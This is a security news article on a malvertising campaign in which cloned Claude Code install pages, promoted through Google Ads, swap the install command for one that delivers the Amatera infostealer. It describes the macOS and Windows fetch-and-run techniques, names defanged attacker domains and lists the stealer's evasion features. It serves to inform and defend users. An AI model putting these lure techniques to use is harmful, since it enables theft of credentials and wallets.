Fake Claude Code installation pages are delivering malware through Google Ads. Push Security published its findings on March 6, 2026, documenting at least 17 lookalike domains that replace the real install command with one that delivers Amatera Stealer, an infostealer targeting browser credentials, cryptocurrency wallets, and session tokens. BleepingComputer confirmed that the malicious sponsored results were still live at the time of publication.
Push Security calls the technique InstallFix. It is a variant of ClickFix (a social engineering method that tricks users into running malicious commands), but with one key difference. Traditional ClickFix attacks need a manufactured excuse to get users to paste a command, whether a fake CAPTCHA, a fabricated error, or a bogus system prompt. InstallFix needs none of that. The user genuinely wants to install software, and the fake page gives them what looks like the real install command.
The cloned pages are pixel-perfect replicas of the official Claude Code documentation. Layout, Anthropic branding, sidebar navigation, working links. The only meaningful change is inside the install one-liner itself. Instead of fetching the script from claude.ai, the command points to attacker-controlled infrastructure. On macOS, it base64-decodes a hidden URL and pipes a shell script into zsh. On Windows, cmd.exe spawns mshta.exe to execute remote content from the domain claude[.]update-version[.]com. Clicking anything else on the page redirects to the legitimate Anthropic site, reducing suspicion.
The reality is that users are going to encounter malicious links through stealthy channels like malvertising every day, just through normal internet browsing, without being actively targeted.
— Said Jacques Louw, Co-founder and CPO of Push Security
Distribution runs entirely through Google Ads. Searches for "Claude Code install," "Claude Code CLI," and similar queries return sponsored results above the organic links to Anthropic's real documentation. BleepingComputer identified claude-code-cmd.squarespace[.]com as the top result for "install claude code." Other cloned domains sit on Cloudflare Pages and Tencent EdgeOne. Search engines typically suppress subdomains from displayed URLs, giving the attackers additional cover. According to Push Security, 4 in 5 ClickFix lures they intercept reach victims through search engines, not email.
The payload is Amatera Stealer. Proofpoint first documented it on June 16, 2025, identifying it as a rebranded version of ACR Stealer (also known as AcridRain). ACR's operator, a threat actor tracked as "SheldIO," sold the source code on underground forums in July 2024. Amatera is now sold as malware-as-a-service (MaaS, a subscription model that lets criminal operators rent access to ready-made malware) with plans ranging from $199 per month to $1,499 per year.
Related: CVE roundup March 7–8: WooCommerce, Parse Server, Netmaker, and a CVSS 9.9 in an LLM platform
Amatera harvests browser-saved passwords, cookies, session tokens, and cryptocurrency wallet credentials. eSentire's Threat Response Unit analyzed it in November 2025 and found it targets 149 cryptocurrency wallets and 43 password managers. It uses WoW64 SysCalls to bypass user-mode hooks in EDR (endpoint detection and response) products, NTSockets for C2 (command-and-control) communication, and hardcoded Cloudflare CDN IP addresses to disguise its traffic as legitimate.
While Amatera Stealer retains the core of its predecessor, it has undergone enough development and enhancement to stand out as a distinct and noteworthy threat.
— According to the Proofpoint Threat Research Team, June 2025.
Claude Code is not the only AI tool being impersonated. In February 2026, attackers abused Claude artifacts (public user-generated content hosted on the claude.ai domain) in ClickFix campaigns that BleepingComputer reported were viewed over 15,000 times before removal. Fake Homebrew installation pages delivered the Cuckoo infostealer in January 2026, according to Hunt.io. Fake OpenClaw installers on GitHub were boosted by Bing's AI-enhanced search results. Trojanized npm packages mimicked the official Claude Code package name. Any tool with a "copy this command" onboarding flow and a fast-growing audience is a potential target.
Amatera's rise coincides with the disruption of Lumma Stealer, previously the dominant MaaS infostealer. In May 2025, Operation Endgame seized 2,300 Lumma domains. Proofpoint noted that displaced threat actors would seek alternatives. Amatera's expanding distribution channels and subscription pricing position it as a direct replacement.
Neither Google nor Anthropic has commented publicly on the campaign as of March 9, 2026. Push Security has published a full list of indicators of compromise, including 17 cloned domains, three payload-hosting domains, and the specific malicious commands used in the attacks.
Developers searching for Claude Code should install it only from the official documentation at docs.anthropic.com. Do not click sponsored search results for CLI tool installations. Before executing any curl-to-bash command, read the full URL inside it, not just the page it appears on. If you ran a command from a fake Claude Code page, treat all browser-stored passwords, cookies, session tokens, and crypto wallet credentials as compromised. Change them from a separate trusted device and revoke all active sessions.
Have a story? Become a contributor.
We work with independent researchers and cybersecurity professionals. Send us a tip or submit your article for editorial review.
